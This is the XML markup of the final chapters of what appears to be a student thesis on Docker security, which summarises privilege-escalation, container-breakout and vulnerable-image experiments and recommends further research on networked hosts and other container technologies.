        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc87032945"/>
      <w:r>
        <w:t>WHO CAN BENEFIT?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="6D6C1D42" w14:textId="2733D56C" w:rsidR="00474BBC" w:rsidRPr="00474BBC" w:rsidRDefault="00474BBC" w:rsidP="00474BBC">
      <w:r>
        <w:t xml:space="preserve">Docker is becoming the de facto containerisation tool and many big companies </w:t>
      </w:r>
      <w:r w:rsidR="0072545D">
        <w:t>such as google, Facebook, PayPal, and Spotify are major use</w:t>
      </w:r>
      <w:r w:rsidR="00887274">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="0072545D">
        <w:t xml:space="preserve"> it. However, Docker being a recent developed technology</w:t>
      </w:r>
      <w:r w:rsidR="00F55CFF">
        <w:t xml:space="preserve"> it is vital to research and test </w:t>
      </w:r>
      <w:r w:rsidR="006B11E9">
        <w:t>its security system</w:t>
      </w:r>
      <w:r w:rsidR="00887274">
        <w:t xml:space="preserve">. As such, this </w:t>
      </w:r>
      <w:r w:rsidR="00F54191">
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidR="00887274">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54191">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="00887274">
        <w:t>clearly</w:t>
      </w:r>
      <w:r w:rsidR="00F54191">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54191">
        <w:lastRenderedPageBreak/>
        <w:t>showed</w:t>
      </w:r>
      <w:r w:rsidR="00887274">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54191">
        <w:t xml:space="preserve">the potential security </w:t>
      </w:r>
      <w:r w:rsidR="002C6397">
        <w:t>threats and attacks that could occur on Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00887274">
        <w:t xml:space="preserve"> supplemented with practical</w:t>
      </w:r>
      <w:r w:rsidR="00F54191">
        <w:t xml:space="preserve"> experiment.</w:t>
      </w:r>
      <w:r w:rsidR="002C6397">
        <w:t xml:space="preserve"> Therefore, this work can be useful and crucial to Docker communities and users.</w:t>
      </w:r>
      <w:r w:rsidR="00BB1738">
        <w:t xml:space="preserve"> On top of that, it can be used to benefit big enterprises and organisation to make them aware of the impact and consequences of the attacks. Further, this work can be used for academia and research</w:t>
      </w:r>
      <w:r w:rsidR="00DC07D8">
        <w:t>, especially in the security field.</w:t>
      </w:r>
      <w:r w:rsidR="00BA0048">
        <w:t xml:space="preserve"> Furthermore, this work is essential and boon to DevOps, software developers, and cloud experts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FD43F" w14:textId="27A361CE" w:rsidR="00557275" w:rsidRDefault="00DD47B6" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_Toc87032946"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w14:paraId="41EBE63D" w14:textId="734D0034" w:rsidR="006441A2" w:rsidRDefault="006441A2" w:rsidP="006441A2">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="006827A5">
        <w:t>analysed and discussed the r</w:t>
      </w:r>
      <w:r w:rsidR="00F534CA">
        <w:t>esults gathered from running the experiments.</w:t>
      </w:r>
      <w:r w:rsidR="00C42F79">
        <w:t xml:space="preserve"> The re</w:t>
      </w:r>
      <w:r w:rsidR="00DD35C1">
        <w:t xml:space="preserve">sults confirm that the </w:t>
      </w:r>
      <w:r w:rsidR="00F07B31">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DD35C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD1E30">
        <w:t>were completed with</w:t>
      </w:r>
      <w:r w:rsidR="00F07B31">
        <w:t xml:space="preserve"> success. The author believe</w:t>
      </w:r>
      <w:r w:rsidR="00F252B7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E86979">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00FC0F84">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E86979">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="0096150D">
        <w:t>security aspect needs more work and improvement</w:t>
      </w:r>
      <w:r w:rsidR="0047584C">
        <w:t>, although it</w:t>
      </w:r>
      <w:r w:rsidR="002C191B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A08CD">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="003753DC">
        <w:t xml:space="preserve">many </w:t>
      </w:r>
      <w:r w:rsidR="009A08CD">
        <w:t xml:space="preserve">advantages and </w:t>
      </w:r>
      <w:r w:rsidR="003753DC">
        <w:t>benefits.</w:t>
      </w:r>
      <w:r w:rsidR="00F47A45">
        <w:t xml:space="preserve"> However, Do</w:t>
      </w:r>
      <w:r w:rsidR="00421B0D">
        <w:t xml:space="preserve">cker can be a reliable and trusted </w:t>
      </w:r>
      <w:r w:rsidR="00C47E7E">
        <w:t xml:space="preserve">containerization if used with </w:t>
      </w:r>
      <w:r w:rsidR="001D78A7">
        <w:t xml:space="preserve">prudence </w:t>
      </w:r>
      <w:r w:rsidR="001128E2">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00436FF7">
        <w:t xml:space="preserve"> applying </w:t>
      </w:r>
      <w:r w:rsidR="00F23D2E">
        <w:t>the remediation techniques discussed</w:t>
      </w:r>
      <w:r w:rsidR="00966B75">
        <w:t xml:space="preserve"> above.</w:t>
      </w:r>
      <w:r w:rsidR="00EC6435">
        <w:t xml:space="preserve"> Overall, the</w:t>
      </w:r>
      <w:r w:rsidR="00251363">
        <w:t xml:space="preserve"> attacks conducted </w:t>
      </w:r>
      <w:r w:rsidR="00992DDE">
        <w:t>hav</w:t>
      </w:r>
      <w:r w:rsidR="008C450F">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="004860A5">
        <w:t xml:space="preserve">outlined </w:t>
      </w:r>
      <w:r w:rsidR="007F0ACE">
        <w:t xml:space="preserve">and examined </w:t>
      </w:r>
      <w:r w:rsidR="004860A5">
        <w:t xml:space="preserve">the security </w:t>
      </w:r>
      <w:r w:rsidR="0022405A">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00083631">
        <w:t>that ex</w:t>
      </w:r>
      <w:r w:rsidR="00863705">
        <w:t>ist within the</w:t>
      </w:r>
      <w:r w:rsidR="0022405A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00681B4D">
        <w:t>Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00863705">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DC16D" w14:textId="3FFD2412" w:rsidR="00863705" w:rsidRPr="006441A2" w:rsidRDefault="00863705" w:rsidP="006441A2">
      <w:r>
        <w:t>The next chapter will conclude the project</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t xml:space="preserve"> along with </w:t>
      </w:r>
      <w:r>
        <w:t>recommendations for fu</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t>ture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t>study</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9301C" w14:textId="77777777" w:rsidR="000E2251" w:rsidRPr="00172214" w:rsidRDefault="000E2251" w:rsidP="00172214"/>
    <w:p w14:paraId="491B185F" w14:textId="2F82BE9E" w:rsidR="000E2B73" w:rsidRDefault="000E2B73" w:rsidP="0052761F"/>
    <w:p w14:paraId="45D77F87" w14:textId="77777777" w:rsidR="000E2B73" w:rsidRPr="0052761F" w:rsidRDefault="000E2B73" w:rsidP="0052761F"/>
    <w:p w14:paraId="393ADD39" w14:textId="5C09647A" w:rsidR="00760DE9" w:rsidRPr="00F84650" w:rsidRDefault="00C50078" w:rsidP="005A3D1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAC54E" w14:textId="77777777" w:rsidR="002C4414" w:rsidRPr="002C4414" w:rsidRDefault="002C4414" w:rsidP="002C4414"/>
    <w:p w14:paraId="526E3924" w14:textId="77777777" w:rsidR="00284E90" w:rsidRPr="00284E90" w:rsidRDefault="00284E90" w:rsidP="00284E90"/>
    <w:p w14:paraId="3E39F2C4" w14:textId="77777777" w:rsidR="00AE09AC" w:rsidRDefault="00AE09AC" w:rsidP="00AE09AC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F02A96" w14:textId="1D363968" w:rsidR="00646269" w:rsidRPr="00646269" w:rsidRDefault="00646269" w:rsidP="00646269"/>
    <w:p w14:paraId="40DFF41D" w14:textId="77777777" w:rsidR="00F4544E" w:rsidRPr="006344FA" w:rsidRDefault="00F4544E" w:rsidP="006344FA"/>
    <w:p w14:paraId="71B7C740" w14:textId="77777777" w:rsidR="0049245D" w:rsidRPr="0049245D" w:rsidRDefault="0049245D" w:rsidP="0049245D"/>
    <w:p w14:paraId="1731713A" w14:textId="77777777" w:rsidR="008D4AAB" w:rsidRDefault="008D4AAB" w:rsidP="006554BD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78476A4E" w14:textId="4AB1BA2F" w:rsidR="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27"/>
    <w:p w14:paraId="1F408C6C" w14:textId="037BBD97" w:rsidR="00CD1685" w:rsidRDefault="009632C0" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Toc87032947"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A13BEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD1685">
        <w:t>CONCLUSIONS AND RECOMMENDATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="49BDD42B" w14:textId="76313EDC" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc87032948"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="5A4565B2" w14:textId="5884E923" w:rsidR="00CD1685" w:rsidRPr="00CD1685" w:rsidRDefault="007A540C" w:rsidP="00CD1685">
      <w:r>
        <w:t xml:space="preserve">This chapter discusses </w:t>
      </w:r>
      <w:r w:rsidR="007E08EE">
        <w:t>the fulfilment of the thesis</w:t>
      </w:r>
      <w:r w:rsidR="00205A24">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="007E08EE">
        <w:t xml:space="preserve"> research question mentioned in section 5</w:t>
      </w:r>
      <w:r w:rsidR="00205A24">
        <w:t>.1. The answers to the question are based on the findings from the experiment. In addition, this chapter includes some recommendations</w:t>
      </w:r>
      <w:r w:rsidR="00BE381A">
        <w:t xml:space="preserve"> for further research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9EEFB2" w14:textId="7BFFBBBD" w:rsidR="00CD1685" w:rsidRDefault="00D015C1" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc87032949"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="298EBB10" w14:textId="29864894" w:rsidR="005221CA" w:rsidRPr="00CD1685" w:rsidRDefault="00317F04" w:rsidP="00CD1685">
      <w:r>
        <w:t>The purpose of this project was to examine Docker containers security regarding misconfigured images and vulnerable applications.</w:t>
      </w:r>
      <w:r w:rsidR="008670D1">
        <w:t xml:space="preserve"> The project involved three attacks, including privilege escalation, container breakout, and using </w:t>
      </w:r>
      <w:r w:rsidR="00827F89">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="008670D1">
        <w:t>vulnerable application to assess Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00827F89">
        <w:t>’ security</w:t>
      </w:r>
      <w:r w:rsidR="008670D1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D28E9">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="005221CA">
        <w:t xml:space="preserve">author has conducted background research and literature review to </w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidR="005221CA">
        <w:t xml:space="preserve"> a greater understanding and knowledge </w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="005221CA">
        <w:t xml:space="preserve"> Docker ecosystems, specifically its security aspects.</w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t xml:space="preserve"> This knowledge was </w:t>
      </w:r>
      <w:r w:rsidR="00B06D15">
        <w:t xml:space="preserve">applied </w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B06D15">
        <w:t>design, develop, and implement the security attacks</w:t>
      </w:r>
      <w:r w:rsidR="007C5610">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007C5610">
        <w:t>in order</w:t>
      </w:r>
      <w:r w:rsidR="00B06D15">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B06D15">
        <w:t xml:space="preserve"> achieve this project’s aims and objectives.</w:t>
      </w:r>
      <w:r w:rsidR="003D5B98">
        <w:t xml:space="preserve"> The findings and outcomes from the experiments show that the attacks were completed effectively, and the author believes that Docker technology requires more work on its security side.</w:t>
      </w:r>
      <w:r w:rsidR="00D015C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D015C1">
        <w:t>In particular, allowing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D015C1">
        <w:t xml:space="preserve"> users to control the Docker daemon can </w:t>
      </w:r>
      <w:r w:rsidR="004D0FCC">
        <w:t>have negative impact on Docker security and its surroundings</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1256020504"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C4078A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C4078A">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C4078A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="00C4078A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004D0FCC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53360D1F" w14:textId="1ACEC08A" w:rsidR="00CD1685" w:rsidRDefault="00D015C1" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc87032950"/>
      <w:r>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C5319" w14:textId="3AC10BD3" w:rsidR="00F6416C" w:rsidRDefault="00604972" w:rsidP="00E84EBF">
      <w:r>
        <w:t xml:space="preserve">Docker has become the most prominent technology in the containerization industry as it eases and </w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>accelerate</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the deployment</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>istribution, and delivery of applications across enterprise systems</w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t xml:space="preserve"> and the cloud</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve">. However, </w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018762B">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>a recent technology</w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>thus</w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> its security platform </w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t>demands</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t>probes</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t xml:space="preserve">for vulnerabilities and exploits to </w:t>
      </w:r>
      <w:r w:rsidR="0018762B">
        <w:t>make industries and individuals aware</w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0018762B">
        <w:t>prevent further security attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB2427">
        <w:t>In this project, the author investigated Docker security using three attacks involving- privilege escalation, container breakout, and a vulnerable application.</w:t>
      </w:r>
      <w:r w:rsidR="004A20E9">
        <w:t xml:space="preserve"> The author conducted a comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="00F6416C">
        <w:t xml:space="preserve">background research and </w:t>
      </w:r>
      <w:r w:rsidR="004A20E9">
        <w:t xml:space="preserve">literature review </w:t>
      </w:r>
      <w:r w:rsidR="00BD617D">
        <w:t>to develop and implement the security attacks on the Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="00F6416C">
        <w:t xml:space="preserve"> The background research outlined Docker architecture</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t xml:space="preserve"> and its various components</w:t>
      </w:r>
      <w:r w:rsidR="00F6416C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00660B2F">
        <w:t xml:space="preserve"> Also, it provided the best security techniques of Docker and its main security threats and vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t xml:space="preserve"> The literature review evaluated previous works related to this project. The review show</w:t>
      </w:r>
      <w:r w:rsidR="004B64B6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t xml:space="preserve"> that Docker is more vulnerable to misconfigured images and privilege escalation attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF7BB1" w14:textId="32C3AB6F" w:rsidR="004B64B6" w:rsidRDefault="004B64B6" w:rsidP="00E84EBF">
      <w:r>
        <w:t>Further, a systematic methodology was developed</w:t>
      </w:r>
      <w:r w:rsidR="00CA0AB7">
        <w:t xml:space="preserve"> based on scientific approaches and methods. The methodology focuses mainly on how the author </w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="00CA0AB7">
        <w:t xml:space="preserve"> collect and interpret </w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CA0AB7">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:t xml:space="preserve">. As </w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">previously mentioned, the project followed positivism and deductive approaches. The data was collected through observation, experiment, and research and presented in screenshots. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02903A42" w14:textId="7D8E5E30" w:rsidR="00481400" w:rsidRDefault="00F07778" w:rsidP="00E84EBF">
      <w:r>
        <w:t xml:space="preserve">For the experiment, the first two attacks </w:t>
      </w:r>
      <w:r w:rsidR="00B1190C">
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leveraged scripts </w:t>
      </w:r>
      <w:r w:rsidR="0023492C">
        <w:t xml:space="preserve">of Dockerfiles </w:t>
      </w:r>
      <w:r>
        <w:t>written by the author</w:t>
      </w:r>
      <w:r w:rsidR="005C4FD3">
        <w:t xml:space="preserve"> for this project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B1190C">
        <w:t>to conduct privilege escalation and container breakout attacks. In contrast, the last attack was based on a vulnerable application downloaded from the Docker Hub.</w:t>
      </w:r>
      <w:r w:rsidR="00350606">
        <w:t xml:space="preserve"> The experiment was conducted on a single laptop with Ubuntu version 20.04 and the latest Docker installed.</w:t>
      </w:r>
      <w:r w:rsidR="00275E11">
        <w:t xml:space="preserve"> Based on the results obtained from the three experiments, the author believes that Docker security has still a long way to reach maturity.</w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve"> However, this does not mean that Docker is not </w:t>
      </w:r>
      <w:r w:rsidR="00DE3E01">
        <w:t xml:space="preserve">fundamentally </w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve">secure to use. The fundamental problem </w:t>
      </w:r>
      <w:r w:rsidR="00D149AC">
        <w:t>lies in the integrity and authenticity of Docker images</w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve">, specifically </w:t>
      </w:r>
      <w:r w:rsidR="00D149AC">
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve"> Docker Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E32AFF" w14:textId="5841588D" w:rsidR="00275E11" w:rsidRDefault="00664BC3" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Toc87032951"/>
      <w:r>
        <w:t>RECOMMENDATIONS FOR FURTHER RESEARCH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="300115A5" w14:textId="64803675" w:rsidR="00DE3E01" w:rsidRDefault="00CB23A7" w:rsidP="00236CFC">
      <w:r>
        <w:t xml:space="preserve">This project has highlighted </w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> researchable aspects that could be pursued for further study.</w:t>
      </w:r>
      <w:r w:rsidR="00F434D3">
        <w:t xml:space="preserve"> The experiments were undertaken on a single host machine, although the attacks can be replicated using multiple host machines.</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t>he author’s opinion</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t xml:space="preserve"> that this project could be further researched, involv</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t>multiple hosts connected through network</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t xml:space="preserve"> Further, this project highlighted focusing on three </w:t>
      </w:r>
      <w:r w:rsidR="00093277">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t xml:space="preserve"> only.</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t xml:space="preserve"> Therefore, further </w:t>
      </w:r>
      <w:r w:rsidR="00C00FFB">
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t xml:space="preserve"> of this project would be to research and experiment</w:t>
      </w:r>
      <w:r w:rsidR="00C46B4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>comprising</w:t>
      </w:r>
      <w:r w:rsidR="00C46B4D">
        <w:t xml:space="preserve"> more</w:t>
      </w:r>
      <w:r w:rsidR="00302118">
        <w:t xml:space="preserve"> security </w:t>
      </w:r>
      <w:r w:rsidR="00C46B4D">
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t xml:space="preserve"> of Docker</w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>, such as MitM and ARP poisoning attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t xml:space="preserve"> Another attractive area that could be further explored is examin</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t xml:space="preserve"> the security of LXC containers as they are the foundation of Docker technology</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>uch</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t xml:space="preserve"> study could result </w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>a constructive</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t xml:space="preserve"> and critical analysis that is essential and might contribute to Docker security</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CC53D" w14:textId="273DBF1D" w:rsidR="004B64B6" w:rsidRDefault="000C3AA9" w:rsidP="00E84EBF">
      <w:r>
        <w:t xml:space="preserve"> Further, this thesis evaluated </w:t>
      </w:r>
      <w:r w:rsidR="001F3DB2">
        <w:t xml:space="preserve">the security of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Docker containerization </w:t>
      </w:r>
      <w:r w:rsidR="00DE3E01">
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:t>. Therefore, analysing and comparing the security of Docker with other containerization technolog</w:t>
      </w:r>
      <w:r w:rsidR="00DE3E01">
        <w:t>ies is another interesting area to look at</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t>, as it is inclusive.</w:t>
      </w:r>
      <w:r w:rsidR="005027FB">
        <w:t xml:space="preserve"> Such studies could lead to</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t xml:space="preserve">more insightful and comprehensive security analysis </w:t>
      </w:r>
      <w:r w:rsidR="00EF7C68">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t xml:space="preserve"> the current containerization technologies</w:t>
      </w:r>
      <w:r w:rsidR="00EF7C68">
        <w:t xml:space="preserve"> in general</w:t>
      </w:r>
